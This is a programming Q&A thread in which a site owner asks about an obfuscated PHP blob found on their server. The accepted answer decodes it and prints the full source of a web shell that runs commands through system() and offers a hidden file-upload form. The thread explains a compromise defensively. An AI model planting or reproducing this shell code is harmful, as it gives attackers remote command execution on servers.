# A suspected code uploaded in my website

Tags: php, security

Could someone explain me what is the effect of this snippet :

eval(gzinflate(str_rot13(base64_decode('DdHJZaJAAADQX8ktQWQAISzWWSVyUAdOAU6WhliKpUwEpExx8esn7xfe1+e/L0WSNzzHza5rSI+8iSe8G6fhdOimPbdY4hELHz8ZQbsM794x0ZOwNxaooVyjPDqIt16eNJbkEyo0fMZegybPsQ+FSvKaE4xNv6Za7cURokS3tgFbjtIzVaJECOXQcc/HRO9oVHY9iTSnq58/F+HUuSBxTiWIVrAZ6ZW9kYle2YPOTrxXE2KGRSDzmsC113CcKRnd3asSrIEwz2gh8uz3zJTKvHFXy5YPz1Uti1xshTfomvsGFyUW6ray21bNtpgwI6UmdkJV4Wk314QUgjH32JAkfbBhuvp3kcD+oiOz7MetE3w/litBrktQNC5nZOpGyYrmV6kKVgZa02bImL6Zy4JRYKbqgM0xIS6X+Iy74fai3gvJgc9ItPKKC3wESZWwTWcEfGealUXmof1P+svlFWIU7hENqMO6YlDopKeX3kSGFVSSZufsjBq3CeH8RVlAB51qzzJLZMemFnabbHkAzgFoU/B2XAXsnqPgJjIheHq8REYvu+L3FpcNIh0FglectVd7SV8iIThgOtI22K5sfCqf9LwdyRi86hDaM2MPzHzLdToOPdO6664iqwHH9LL9XDD8evrYDv6DiDdLlHwGsuuDTdYhzYaBXSqRySX4/ufX37evz/8='))));

Answer (score 4, accepted):

Your server has been hacked. See https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server for recovery tips. This code allows an attacker to upload any file they want to your server. It decodes to:

```
<?php error_reporting(0); ?>
<?php system($_SERVER["HTTP_SHELL"]);
if ($_GET["x"]=="kaMtiEz") {
?>
<form method="POST" enctype="multipart/form-data" action="<?$_SERVER["PHP_SELF"]?>">
<input type="file" name="myFile"><input type="submit" name="ok" value="Upload">
</form>
<?php
if (isset($_POST["ok"]) && isset($_FILES["myFile"])) {
   $file = $_FILES["myFile"]["tmp_name"];
   $name = $_FILES["myFile"]["name"];
   if (!move_uploaded_file($file, $name)) {
       echo "Unable to upload file";
   } else {
       echo "File Uploaded...";
   }
}
    }
if (!empty($_GET["x"])) {
    echo "<pre>";
    system($_GET["x"]);
    echo "Copyright 2011 by kaMtiEz - MagelangCyber Team ! d0nt rem0ve copyright if u real hax0r </pre>";
    exit;
}
?>
```

Comment: @HalfCrazed Honor amongst thieves, it'd seem.

Comment: Wasted talent is what I call it. It's a shame, actually.

Comment: Fortunately the resulting URL of uploaded file which contains this snippet is obfuscated + to be able to get the URL you have to to possess admin account + the URL forces downloading the file without execution.

Comment: @Simohammedhttc Your server is compromised, badly, and they could potentially have uploaded files with names in `$_FILES["myFile"]["name"]`  like `/etc/something/critical`. You don't think they did anything, but you thought your server was secure before this, right?

Comment: @ceejayoz I checked the same folder where this file is loaded, I didn't find any other loaded files.

Comment: @Simohammedhttc Doesn't matter. They could craft a special filename that can `move_uploaded_file` it into any folder your server has write access to. **Do not trust the server.**

Comment: @ceejayoz OK I will make further investigation thank you